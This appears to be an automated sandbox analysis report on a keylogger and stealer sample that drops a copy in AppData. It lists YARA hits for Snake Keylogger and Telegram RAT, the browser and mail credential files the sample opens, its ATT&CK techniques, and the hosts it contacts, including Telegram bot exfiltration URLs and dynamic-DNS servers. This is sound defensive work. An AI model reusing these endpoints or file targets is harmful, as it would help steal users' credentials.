Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Users\user\AppData\Roaming\yxXYABHh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Users\user\AppData\Roaming\yxXYABHh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PvAmrCZENy.exe	78%	Virustotal		Browse
PvAmrCZENy.exe	71%	ReversingLabs	Win32.Trojan.Jalapeno
PvAmrCZENy.exe	100%	Avira	TR/Kryptik.jxxgz

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\yxXYABHh.exe	100%	Avira	TR/Kryptik.jxxgz
C:\Users\user\AppData\Roaming\yxXYABHh.exe	71%	ReversingLabs	Win32.Trojan.Jalapeno

Source	Detection	Scanner	Label	Link
http://crl.mi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.96.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002791000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 0000000D.00000003.1206366037.0000022AEB710000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.dr	false		high
http://crl.ver)	svchost.exe, 0000000D.00000002.2132640961.0000022AEB800000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F74000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	svchost.exe, 0000000D.00000002.2132995741.0000022AEB8C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.13.dr	false		high
https://www.ecosia.org/newtab/v20	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002760000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.000000000264B000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp	false		high
